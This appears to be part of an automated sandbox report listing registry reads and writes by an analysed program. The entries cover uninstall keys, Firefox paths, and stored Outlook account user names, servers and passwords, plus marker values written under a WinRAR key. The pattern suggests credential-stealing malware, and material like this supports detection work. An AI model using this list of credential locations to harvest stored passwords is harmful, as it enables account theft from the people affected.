| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{f325f05b-f963-4640-a43b-c8a494cdda0f} | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{f325f05b-f963-4640-a43b-c8a494cdda0f} | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185} | value_name = UninstallString, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185} | value_name = UninstallString, data = 77 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185} | value_name = DisplayName, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185} | value_name = DisplayName, data = 77 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\WinRAR | value_name = HWID, type = REG_BINARY |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\WinRAR | value_name = HWID, data = 123 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Mozilla\Firefox | value_name = PathToExe, type = REG_NONE |
|
9 | |
| Read Value | HKEY_CURRENT_USER\Software\Mozilla\Firefox\Crash Reporter | value_name = PathToExe, type = REG_NONE |
|
9 | |
| Read Value | HKEY_CURRENT_USER\Software\Mozilla\Firefox\TaskBarIDs | value_name = PathToExe, type = REG_NONE |
|
9 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox | value_name = PathToExe, type = REG_NONE |
|
9 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox\TaskBarIDs | value_name = PathToExe, type = REG_NONE |
|
9 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox | value_name = PathToExe, type = REG_NONE |
|
9 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US) | value_name = PathToExe, type = REG_NONE |
|
9 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US)\Main | value_name = PathToExe, data = 0, type = REG_SZ |
|
3 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US)\Main | value_name = PathToExe, data = 67 |
|
3 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US)\Uninstall | value_name = PathToExe, type = REG_NONE |
|
9 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0 | value_name = PathToExe, type = REG_NONE |
|
9 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0\bin | value_name = PathToExe, data = 0, type = REG_SZ |
|
3 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0\bin | value_name = PathToExe, data = 67 |
|
3 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0\extensions | value_name = PathToExe, type = REG_NONE |
|
9 | |
| Read Value | HKEY_CURRENT_USER\Software\Mozilla | value_name = PathToExe, type = REG_NONE |
|
3 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Mozilla | value_name = PathToExe, type = REG_NONE |
|
3 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Mozilla\MaintenanceService | value_name = PathToExe, type = REG_NONE |
|
3 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Mozilla\MaintenanceService\f9b87e891978e3145f0f8f9953eadc00 | value_name = PathToExe, type = REG_NONE |
|
3 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Mozilla\MaintenanceService\f9b87e891978e3145f0f8f9953eadc00\0 | value_name = PathToExe, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows Mail | value_name = Salt, type = REG_NONE |
|
3 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Account Manager | value_name = Outlook, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Account Manager | value_name = Outlook, data = 83 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | value_name = SMTP Email Address, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | value_name = SMTP Server, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | value_name = POP3 Server, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | value_name = POP3 User Name, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | value_name = SMTP User Name, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | value_name = NNTP Email Address, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | value_name = NNTP User Name, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | value_name = NNTP Server, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | value_name = IMAP Server, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | value_name = IMAP User Name, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | value_name = Email, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | value_name = HTTP User, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | value_name = HTTP Server URL, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | value_name = POP3 User, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | value_name = IMAP User, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | value_name = HTTPMail User Name, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | value_name = HTTPMail Server, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | value_name = SMTP User, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | value_name = POP3 Password2, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | value_name = IMAP Password2, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | value_name = NNTP Password2, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | value_name = HTTPMail Password2, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | value_name = SMTP Password2, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | value_name = POP3 Password, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | value_name = IMAP Password, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | value_name = NNTP Password, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | value_name = HTTP Password, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | value_name = SMTP Password, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | value_name = POP3 Port, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | value_name = SMTP Port, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | value_name = IMAP Port, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = SMTP Email Address, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = SMTP Server, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = POP3 Server, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = POP3 User Name, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = SMTP User Name, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = NNTP Email Address, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = NNTP User Name, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = NNTP Server, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = IMAP Server, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = IMAP User Name, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = Email, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = HTTP User, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = HTTP Server URL, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = POP3 User, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = IMAP User, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = HTTPMail User Name, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = HTTPMail Server, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = SMTP User, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = POP3 Password2, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = IMAP Password2, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = NNTP Password2, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = HTTPMail Password2, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = SMTP Password2, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = POP3 Password, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = IMAP Password, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = NNTP Password, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = HTTP Password, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = SMTP Password, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = POP3 Port, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = SMTP Port, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = IMAP Port, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | value_name = SMTP Email Address, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | value_name = SMTP Server, type = REG_BINARY |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | value_name = SMTP Server, data = 100 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | value_name = POP3 Server, type = REG_BINARY |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | value_name = POP3 Server, data = 97 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | value_name = POP3 User Name, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | value_name = SMTP User Name, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | value_name = NNTP Email Address, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | value_name = NNTP User Name, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | value_name = NNTP Server, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | value_name = IMAP Server, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | value_name = IMAP User Name, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | value_name = Email, type = REG_BINARY |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | value_name = Email, data = 102 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | value_name = HTTP User, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | value_name = HTTP Server URL, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | value_name = POP3 User, type = REG_BINARY |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | value_name = POP3 User, data = 102 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | value_name = IMAP User, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | value_name = HTTPMail User Name, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | value_name = HTTPMail Server, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | value_name = SMTP User, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | value_name = POP3 Password2, type = REG_NONE |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | value_name = IMAP Password2, type = REG_NONE |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 | value_name = SMTP Email Address, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary | value_name = SMTP Email Address, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\WinRAR | value_name = Client Hash, type = REG_NONE |
|
3 | |
| Write Value | HKEY_CURRENT_USER\Software\WinRAR | value_name = HWID, size = 38, type = REG_BINARY |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\WinRAR | value_name = Client Hash, size = 16, type = REG_BINARY |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall | - |
|
1 | |
